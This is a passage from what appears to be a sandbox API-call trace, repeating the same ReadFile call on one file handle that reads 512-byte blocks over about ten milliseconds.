lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, 